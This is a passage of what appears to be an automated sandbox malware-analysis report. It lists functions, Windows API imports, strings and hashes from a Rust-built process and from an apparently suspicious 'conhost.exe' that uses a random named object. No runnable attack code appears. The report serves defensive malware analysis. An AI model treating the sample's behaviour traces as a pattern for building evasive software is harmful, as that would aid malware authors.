CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00007FF63B54F7BB
GetProcAddress.KERNEL32 ref: 00007FF63B54F859
GetCurrentProcess.KERNEL32 ref: 00007FF63B54F872
GetProcAddress.KERNEL32 ref: 00007FF63B54F8D9
GetCurrentProcess.KERNEL32 ref: 00007FF63B54F8F2
ReleaseMutex.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00007FF63B54F95D

Strings

SymSetOptions, xrefs: 00007FF63B54F5B0
SymSetSearchPathW, xrefs: 00007FF63B54F8D2
SymGetSearchPathW, xrefs: 00007FF63B54F68B
assertion failed: len >= 0, xrefs: 00007FF63B54F994
SymInitializeW, xrefs: 00007FF63B54F5E8
SymGetOptions, xrefs: 00007FF63B54F573
EnumerateLoadedModulesW64, xrefs: 00007FF63B54F852
dbghelp.dll, xrefs: 00007FF63B54F53D

Memory Dump Source

Source File: 00000012.00000002.2252455201.00007FF63B541000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF63B540000, based on PE: true

Associated: 00000012.00000002.2252438807.00007FF63B540000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.2252477020.00007FF63B560000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.2254122255.00007FF63B8DB000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.2254736037.00007FF63B8DC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ff63b540000_nlkuzmdacjrb.jbxd

Similarity

API ID: AddressProc$CurrentProcess$Mutex$CloseCreateHandleLibraryLoadObjectReleaseSingleWaitlstrlenmemset
String ID: EnumerateLoadedModulesW64$SymGetOptions$SymGetSearchPathW$SymInitializeW$SymSetOptions$SymSetSearchPathW$assertion failed: len >= 0$dbghelp.dll
API String ID: 18767598-310313858
Opcode ID: fc5280adfdf2b7853c24edd48576d698f2f70bb9135b4bc86369705f9db9025e
Instruction ID: 650316608e2a064bc56194d738b01e9cb4b09462f0adda2fb16415ad2ff3531b
Opcode Fuzzy Hash: fc5280adfdf2b7853c24edd48576d698f2f70bb9135b4bc86369705f9db9025e
Instruction Fuzzy Hash: 29F18B22A09B5295FB119F29A8503B923A0BF4C768F44463ADD8DC77B6DF3CE059A300

Function 00007FF63B54D5F0 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 232windowCOMMON

Download Yara Rule

APIs

memset.VCRUNTIME140 ref: 00007FF63B54D633
GetModuleHandleW.KERNEL32 ref: 00007FF63B54D64C
FormatMessageW.KERNEL32 ref: 00007FF63B54D694
GetLastError.KERNEL32 ref: 00007FF63B54D75D

Strings

NTDLL.DLL, xrefs: 00007FF63B54D645
assertion failed: self.is_char_boundary(new_len)/rustc/9b00956e56009bab2aa15d7bff10916599e3d6d6\library\alloc\src\string.rs, xrefs: 00007FF63B54D990

Memory Dump Source

Source File: 00000012.00000002.2252455201.00007FF63B541000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF63B540000, based on PE: true

Associated: 00000012.00000002.2252438807.00007FF63B540000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.2252477020.00007FF63B560000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.2254122255.00007FF63B8DB000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.2254736037.00007FF63B8DC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ff63b540000_nlkuzmdacjrb.jbxd

Similarity

API ID: ErrorFormatHandleLastMessageModulememset
String ID: NTDLL.DLL$assertion failed: self.is_char_boundary(new_len)/rustc/9b00956e56009bab2aa15d7bff10916599e3d6d6\library\alloc\src\string.rs
API String ID: 1434010500-1267143961
Opcode ID: a2fdf3f50ade1514b8e8d220692a852cc6b1829e34b8d44ffabc660db15a48ab
Instruction ID: 027f8489e511273107e3b499fb0ddd17010914c772257591ab5184cc1e1f47b0
Opcode Fuzzy Hash: a2fdf3f50ade1514b8e8d220692a852cc6b1829e34b8d44ffabc660db15a48ab
Instruction Fuzzy Hash: 06A1B332A09BC284E7718F25D8447F827A0FB493A4F454136DADD87BE6DF789A95E300

Function 00007FF63B547C10 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 193COMMON

Download Yara Rule

APIs

SetLastError.KERNEL32 ref: 00007FF63B547D4A
GetEnvironmentVariableW.KERNEL32 ref: 00007FF63B547D5D
GetLastError.KERNEL32 ref: 00007FF63B547D69
GetLastError.KERNEL32 ref: 00007FF63B547D83

Strings

internal error: entered unreachable code/rustc/9b00956e56009bab2aa15d7bff10916599e3d6d6\library\alloc\src\vec\mod.rs, xrefs: 00007FF63B547ED1

Memory Dump Source

Source File: 00000012.00000002.2252455201.00007FF63B541000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF63B540000, based on PE: true

Associated: 00000012.00000002.2252438807.00007FF63B540000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.2252477020.00007FF63B560000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.2254122255.00007FF63B8DB000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.2254736037.00007FF63B8DC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ff63b540000_nlkuzmdacjrb.jbxd

Similarity

API ID: ErrorLast$EnvironmentVariable
String ID: internal error: entered unreachable code/rustc/9b00956e56009bab2aa15d7bff10916599e3d6d6\library\alloc\src\vec\mod.rs
API String ID: 2691138088-50058851
Opcode ID: 6d5b2da78fe2a7d3d0cf03d165010f37d5f18a7676820ac551e906dfb98e3d0b
Instruction ID: 6867fb0cf1dd9703eab310d842c44006cb3ee771dc42c8b187d3c83596a69930
Opcode Fuzzy Hash: 6d5b2da78fe2a7d3d0cf03d165010f37d5f18a7676820ac551e906dfb98e3d0b
Instruction Fuzzy Hash: 9881E462A04AC285EB318F25DD443E96365FF18BB8F444135DE9C9B7A6DF3C92959300

Function 00007FF63B54A760 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 184COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF63B547980: SetLastError.KERNEL32 ref: 00007FF63B547A79
Part of subcall function 00007FF63B547980: GetCurrentDirectoryW.KERNEL32 ref: 00007FF63B547A85
Part of subcall function 00007FF63B547980: GetLastError.KERNEL32 ref: 00007FF63B547A92
Part of subcall function 00007FF63B547980: GetLastError.KERNEL32 ref: 00007FF63B547AAC

memset.VCRUNTIME140(?), ref: 00007FF63B54A87C
RtlCaptureContext.NTDLL ref: 00007FF63B54A884
RtlLookupFunctionEntry.NTDLL ref: 00007FF63B54A8D5
RtlVirtualUnwind.NTDLL ref: 00007FF63B54AA73

Strings

stack backtrace:, xrefs: 00007FF63B54A7FF
note: Some details are omitted, run with `RUST_BACKTRACE=full` for a verbose backtrace.__rust_begin_short_backtrace__rust_end_short_backtrace [... omitted frame ...], xrefs: 00007FF63B54AAE2

Memory Dump Source

Source File: 00000012.00000002.2252455201.00007FF63B541000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF63B540000, based on PE: true

Associated: 00000012.00000002.2252438807.00007FF63B540000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.2252477020.00007FF63B560000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.2254122255.00007FF63B8DB000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.2254736037.00007FF63B8DC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ff63b540000_nlkuzmdacjrb.jbxd

Similarity

API ID: ErrorLast$CaptureContextCurrentDirectoryEntryFunctionLookupUnwindVirtualmemset
String ID: note: Some details are omitted, run with `RUST_BACKTRACE=full` for a verbose backtrace.__rust_begin_short_backtrace__rust_end_short_backtrace [... omitted frame ...]$stack backtrace:
API String ID: 2744335978-2918537110
Opcode ID: 72805cd616d666f2ac6967fcb4c1961583533f6335081f1f1fdb27a414d68f49
Instruction ID: 30ce4d4796a48fac7e249e06c80b9b6dbc72e5a55868a4def2780f6a9428fdc2
Opcode Fuzzy Hash: 72805cd616d666f2ac6967fcb4c1961583533f6335081f1f1fdb27a414d68f49
Instruction Fuzzy Hash: 18A10D62604FC18CEB718F25EC403EA37A4FB4975DF441129CA8D8BBAADF789259D701

Function 00007FF63B547980 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 157COMMON

Download Yara Rule

APIs

SetLastError.KERNEL32 ref: 00007FF63B547A79
GetCurrentDirectoryW.KERNEL32 ref: 00007FF63B547A85
GetLastError.KERNEL32 ref: 00007FF63B547A92
GetLastError.KERNEL32 ref: 00007FF63B547AAC
GetLastError.KERNEL32 ref: 00007FF63B547B59

Strings

internal error: entered unreachable code/rustc/9b00956e56009bab2aa15d7bff10916599e3d6d6\library\alloc\src\vec\mod.rs, xrefs: 00007FF63B547B8D

Memory Dump Source

Source File: 00000012.00000002.2252455201.00007FF63B541000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF63B540000, based on PE: true

Associated: 00000012.00000002.2252438807.00007FF63B540000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.2252477020.00007FF63B560000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.2254122255.00007FF63B8DB000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.2254736037.00007FF63B8DC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ff63b540000_nlkuzmdacjrb.jbxd

Similarity

API ID: ErrorLast$CurrentDirectory
String ID: internal error: entered unreachable code/rustc/9b00956e56009bab2aa15d7bff10916599e3d6d6\library\alloc\src\vec\mod.rs
API String ID: 3993060814-50058851
Opcode ID: 405081b865c5e5ce2a1847109fdb6946bbed8eb7c725cbd3201916c53e7494c6
Instruction ID: 1a3e36013e1b8f7bc04ea84d8c3e77c395b314fda75163de822a6cebfe669dea
Opcode Fuzzy Hash: 405081b865c5e5ce2a1847109fdb6946bbed8eb7c725cbd3201916c53e7494c6
Instruction Fuzzy Hash: 5951D362A08BC245E7358F26AC443E96354FB08BB8F448535DEAD977A6DF3CA3959300

Function 00007FF63B54DA30 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 200COMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32 ref: 00007FF63B54DA5B
GetLastError.KERNEL32 ref: 00007FF63B54DA74
GetConsoleMode.KERNEL32 ref: 00007FF63B54DAB4
CloseHandle.KERNEL32 ref: 00007FF63B54DD3A

Strings

called `Result::unwrap()` on an `Err` value, xrefs: 00007FF63B54DCB8

Memory Dump Source

Source File: 00000012.00000002.2252455201.00007FF63B541000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF63B540000, based on PE: true

Associated: 00000012.00000002.2252438807.00007FF63B540000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.2252477020.00007FF63B560000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.2254122255.00007FF63B8DB000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.2254736037.00007FF63B8DC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ff63b540000_nlkuzmdacjrb.jbxd

Similarity

API ID: Handle$CloseConsoleErrorLastMode
String ID: called `Result::unwrap()` on an `Err` value
API String ID: 1170577072-2333694755
Opcode ID: e01a37204d0ed50316ae64f771dd6798684bd3ff6aa2ef4f1ae7c1548a6cce87
Instruction ID: 008163130cd2d51fd44a31843e850fdf0eb4f950deb22f99c41df80356ce27ec
Opcode Fuzzy Hash: e01a37204d0ed50316ae64f771dd6798684bd3ff6aa2ef4f1ae7c1548a6cce87
Instruction Fuzzy Hash: FC81D462A0878298FB11CF60E8503FD2760AB087A8F458536DEDE937E6DE7CD595E300

Function 00007FF63B54DD50 Relevance: 7.7, APIs: 5, Instructions: 156COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32 ref: 00007FF63B54DDD5
WriteConsoleW.KERNEL32 ref: 00007FF63B54DE12
WriteConsoleW.KERNEL32 ref: 00007FF63B54DE71
GetLastError.KERNEL32 ref: 00007FF63B54DE7B
GetLastError.KERNEL32 ref: 00007FF63B54DF0E

Memory Dump Source

Source File: 00000012.00000002.2252455201.00007FF63B541000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF63B540000, based on PE: true

Associated: 00000012.00000002.2252438807.00007FF63B540000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.2252477020.00007FF63B560000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.2254122255.00007FF63B8DB000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.2254736037.00007FF63B8DC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ff63b540000_nlkuzmdacjrb.jbxd

Similarity

API ID: ConsoleErrorLastWrite$ByteCharMultiWide
String ID:
API String ID: 1956605914-0
Opcode ID: 0fe4d206bdc36d7527652ce4d84f90233b9924d4907be3a152e2467c999bc63b
Instruction ID: f7fb7ae332da94bf0909e3fe20cc6fefdb076da06713fd302c425cd4cd5b8ae9
Opcode Fuzzy Hash: 0fe4d206bdc36d7527652ce4d84f90233b9924d4907be3a152e2467c999bc63b
Instruction Fuzzy Hash: 3751DF62A1869242FB208F50A9443BA6651EF8C7A0F554136E9CEC3BF6DF3CD995E340

Function 00007FF63B54E6D0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 24libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32 ref: 00007FF63B54E6E3
GetProcAddress.KERNEL32 ref: 00007FF63B54E6F8

Strings

SetThreadDescription, xrefs: 00007FF63B54E6EE
kernel32, xrefs: 00007FF63B54E6DC

Memory Dump Source

Source File: 00000012.00000002.2252455201.00007FF63B541000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF63B540000, based on PE: true

Associated: 00000012.00000002.2252438807.00007FF63B540000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.2252477020.00007FF63B560000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.2254122255.00007FF63B8DB000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.2254736037.00007FF63B8DC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ff63b540000_nlkuzmdacjrb.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: SetThreadDescription$kernel32
API String ID: 1646373207-1950310818
Opcode ID: 88fa0e13c17c9b79e8c73b9d4447e022dd5f321e9298a6fccb875f5b167bc93c
Instruction ID: f2c473ee37f69bc2703e066452191a3846606cc334ccb898f5b0fd768d93c5d7
Opcode Fuzzy Hash: 88fa0e13c17c9b79e8c73b9d4447e022dd5f321e9298a6fccb875f5b167bc93c
Instruction Fuzzy Hash: CFF03050F4A78A92E94E8F45BD941A42260AF0CBF0F84843BC88D87775EF7CA555E300

Function 00007FF63B55D5CC Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 00007FF63B55D5F8
GetCurrentThreadId.KERNEL32 ref: 00007FF63B55D606
GetCurrentProcessId.KERNEL32 ref: 00007FF63B55D612
QueryPerformanceCounter.KERNEL32 ref: 00007FF63B55D622

Memory Dump Source

Source File: 00000012.00000002.2252455201.00007FF63B541000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF63B540000, based on PE: true

Associated: 00000012.00000002.2252438807.00007FF63B540000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.2252477020.00007FF63B560000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.2254122255.00007FF63B8DB000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.2254736037.00007FF63B8DC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ff63b540000_nlkuzmdacjrb.jbxd

Similarity

API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
String ID:
API String ID: 2933794660-0
Opcode ID: 294a0a96a0f81ae7afaf7b16e31fb50118d3dcf11c965d61aa8162dd32814fe9
Instruction ID: 1663116331cbe93e61812c5ba61bf2e27f89deb34869d2a079b79b1e2b7dc844
Opcode Fuzzy Hash: 294a0a96a0f81ae7afaf7b16e31fb50118d3dcf11c965d61aa8162dd32814fe9
Instruction Fuzzy Hash: A7113026B15F068AEB00CF64E8543B833A4FB1D768F441E36DAAD867A4DF78D154C340

Function 00007FF63B54BBE0 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 244COMMON

Download Yara Rule

Strings

Box<dyn Any><unnamed>, xrefs: 00007FF63B54BC88
cannot access a Thread Local Storage value during or after destructionlibrary\std\src\thread\local.rs, xrefs: 00007FF63B54BF1C, 00007FF63B54BF59

Memory Dump Source

Source File: 00000012.00000002.2252455201.00007FF63B541000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF63B540000, based on PE: true

Associated: 00000012.00000002.2252438807.00007FF63B540000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.2252477020.00007FF63B560000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.2254122255.00007FF63B8DB000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.2254736037.00007FF63B8DC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ff63b540000_nlkuzmdacjrb.jbxd

Similarity

API ID:
String ID: Box<dyn Any><unnamed>$cannot access a Thread Local Storage value during or after destructionlibrary\std\src\thread\local.rs
API String ID: 0-3513654867
Opcode ID: ac8c48a5e2f6dbcb9a386e2807e7f6b30d02f319061442bdbbba9e6a5cce45a5
Instruction ID: cada33d7dc2b4d88540df6453c6248d553ba5e63902b3458f0fc840007bedde1
Opcode Fuzzy Hash: ac8c48a5e2f6dbcb9a386e2807e7f6b30d02f319061442bdbbba9e6a5cce45a5
Instruction Fuzzy Hash: 5FB18E32A09B4689EB61CF24D4403BD37A0EB5C7A8F444136DA8D87BA6DF3DE565E340

Analysis Process: conhost.exePID: 504, Parent PID: 5608COMMON

Execution Graph

Execution Coverage:	2.4%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	851
Total number of Limit Nodes:	2

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 0000000140001394 Relevance: 1.5, APIs: 1, Instructions: 24
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDeleteWnfStateName.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000140001156), ref: 00000001400013F7

Memory Dump Source

Source File: 00000017.00000002.3409823550.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000017.00000002.3409748673.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000017.00000002.3409844512.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000017.00000002.3409864252.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000017.00000002.3409882051.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_140000000_conhost.jbxd

Similarity

API ID: DeleteNameState
String ID:
API String ID: 3734940635-0
Opcode ID: 3210746a9923182c7327b5e3e833e7d58ed368a322bb56d3eeddf1d7b1502087
Instruction ID: ea77cefef780fe59d28cb35e84be700af1ff747ec22ba00de631e0254e728e30
Opcode Fuzzy Hash: 3210746a9923182c7327b5e3e833e7d58ed368a322bb56d3eeddf1d7b1502087
Instruction Fuzzy Hash: C7F0A4B2608B408AEA11DB52F85179A77A1F38D7C0F005919BBC947735DB3CC150CB40

Non-executed Functions

Function 00000001400026E0 Relevance: 19.6, APIs: 7, Strings: 4, Instructions: 376
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

wcsncmp.MSVCRT ref: 00000001400028F4
wcscpy.MSVCRT ref: 0000000140002A25
wcscat.MSVCRT ref: 0000000140002A30
wcslen.MSVCRT ref: 0000000140002A38
wcslen.MSVCRT ref: 0000000140002A50
wcslen.MSVCRT ref: 0000000140002AB0
wcslen.MSVCRT ref: 0000000140002B02

Strings

\BaseNamedObjects\sqdbwqfaounzqqdtprwhhpct, xrefs: 00000001400026E9
`, xrefs: 0000000140002CAB
0, xrefs: 00000001400028F9
X, xrefs: 0000000140002C93

Memory Dump Source

Source File: 00000017.00000002.3409823550.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000017.00000002.3409748673.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000017.00000002.3409844512.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000017.00000002.3409864252.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000017.00000002.3409882051.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_140000000_conhost.jbxd

Similarity

API ID: wcslen$wcscatwcscpywcsncmp
String ID: 0$X$\BaseNamedObjects\sqdbwqfaounzqqdtprwhhpct$`
API String ID: 597572034-1571959862
Opcode ID: 185c9c1f25848b36373bdd529c703a72ea962c16b9617e59a2fa1317b054f0dc
Instruction ID: b74dd05d4a6040c45e884f40807bbd4c45a660658f3a768bf3ecd589c10fb269
Opcode Fuzzy Hash: 185c9c1f25848b36373bdd529c703a72ea962c16b9617e59a2fa1317b054f0dc
Instruction Fuzzy Hash: F31248B2608BC481E762CB16F8443EAB7A4F789794F414215EBA857BF5EF78C189C700

Function 0000000140001160 Relevance: 13.6, APIs: 9, Instructions: 130
sleepstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(?,?,?,0000000140001156), ref: 00000001400011A5
_amsg_exit.MSVCRT ref: 00000001400011CC
_initterm.MSVCRT ref: 000000014000120F
SetUnhandledExceptionFilter.KERNEL32(?,?,?,0000000140001156), ref: 000000014000124E
malloc.MSVCRT(?,?,?,0000000140001156), ref: 000000014000127E
strlen.MSVCRT ref: 00000001400012A4
malloc.MSVCRT(?,?,?,0000000140001156), ref: 00000001400012B0
memcpy.MSVCRT ref: 00000001400012C3
_cexit.MSVCRT ref: 000000014000132D

Memory Dump Source

Source File: 00000017.00000002.3409823550.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000017.00000002.3409748673.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000017.00000002.3409844512.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000017.00000002.3409864252.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000017.00000002.3409882051.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_140000000_conhost.jbxd

Similarity

API ID: malloc$ExceptionFilterSleepUnhandled_amsg_exit_cexit_inittermmemcpystrlen
String ID:
API String ID: 2643109117-0
Opcode ID: 0826702d6560d8963aa6be3a9a2bca2e7c57e1532fe8f27e33951a1a52f0c01f
Instruction ID: de31f8ed3ddf153564bdd4405856fabd387a055f97d5097261988c330ce0911c
Opcode Fuzzy Hash: 0826702d6560d8963aa6be3a9a2bca2e7c57e1532fe8f27e33951a1a52f0c01f
Instruction Fuzzy Hash: 475113B1A11A4085FB16EF27F9947EA27A5BB8D7D0F449121FB4E873B2DE38C4958300

Function 0000000140001BA0 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 106
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualQuery.KERNEL32(?,?,?,?,0000000140007C04,0000000140007C04,?,?,0000000140000000,?,0000000140001991), ref: 0000000140001C63
VirtualProtect.KERNEL32(?,?,?,?,0000000140007C04,0000000140007C04,?,?,0000000140000000,?,0000000140001991), ref: 0000000140001CC7
memcpy.MSVCRT ref: 0000000140001CE0
GetLastError.KERNEL32(?,?,?,?,0000000140007C04,0000000140007C04,?,?,0000000140000000,?,0000000140001991), ref: 0000000140001D23

Strings

VirtualProtect failed with code 0x%x, xrefs: 0000000140001D29
VirtualQuery failed for %d bytes at address %p, xrefs: 0000000140001D17
Address %p has no image-section, xrefs: 0000000140001CF4

Memory Dump Source

Source File: 00000017.00000002.3409823550.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000017.00000002.3409748673.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000017.00000002.3409844512.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000017.00000002.3409864252.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000017.00000002.3409882051.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_140000000_conhost.jbxd

Similarity

API ID: Virtual$ErrorLastProtectQuerymemcpy
String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section
API String ID: 2595394609-2123141913
Opcode ID: cdbb9d907875859e3f80f575495464bdaee28c88710b0bedc9e094766cfb12e3
Instruction ID: 16efa6a6843d59a014476df5568b7df2ebffa848eb0c274e9a4a04f444c9e124
Opcode Fuzzy Hash: cdbb9d907875859e3f80f575495464bdaee28c88710b0bedc9e094766cfb12e3
Instruction Fuzzy Hash: 8B4153F1601A4486FA22DF47F884BE927A0E78DBC4F544122EF0E877B1DA38C586C300

Function 0000000140002104 Relevance: 7.6, APIs: 5, Instructions: 51
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

EnterCriticalSection.KERNEL32 ref: 0000000140002118
TlsGetValue.KERNEL32 ref: 000000014000214F
GetLastError.KERNEL32 ref: 0000000140002154
LeaveCriticalSection.KERNEL32 ref: 0000000140002212
DeleteCriticalSection.KERNEL32 ref: 000000014000225D

Memory Dump Source

Source File: 00000017.00000002.3409823550.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000017.00000002.3409748673.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000017.00000002.3409844512.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000017.00000002.3409864252.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000017.00000002.3409882051.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_140000000_conhost.jbxd

Similarity

API ID: CriticalSection$DeleteEnterErrorLastLeaveValue
String ID:
API String ID: 926137887-0
Opcode ID: 3cf6fdcf877a2c463b1673d0d7d37342476749bfb961c2d74f3cd03d9e62891d
Instruction ID: 0e199cc0cf033006c356eea73698cd941ec16a166456d7ae25831b0cf903e09c
Opcode Fuzzy Hash: 3cf6fdcf877a2c463b1673d0d7d37342476749bfb961c2d74f3cd03d9e62891d
Instruction Fuzzy Hash: D321E0B1715A02D2FA5BEB53F9483E923A0B76CBD0F444421FB1A576B4DF7A8986C300

Function 0000000140001E10 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 77
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

CCG , xrefs: 0000000140001E27

Memory Dump Source

Source File: 00000017.00000002.3409823550.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000017.00000002.3409748673.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000017.00000002.3409844512.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000017.00000002.3409864252.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000017.00000002.3409882051.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_140000000_conhost.jbxd

Similarity

API ID:
String ID: CCG
API String ID: 0-1584390748
Opcode ID: 5280163379377ca6e44e0c5d2c698eb6079499830711fbae46cc424a6ca625e0
Instruction ID: a59ecfcda80627e887a2afd302da497d78ca087d7541c475695dc2e3193e6173
Opcode Fuzzy Hash: 5280163379377ca6e44e0c5d2c698eb6079499830711fbae46cc424a6ca625e0
Instruction Fuzzy Hash: 052159B1A0110642FA77DA1BB5943FA1182ABCD7E4F258635FF19473F9DE7C88828241

Function 0000000140001880 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 138
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000140001247), ref: 00000001400019F9

Strings

Unknown pseudo relocation bit size %d., xrefs: 0000000140001B7B
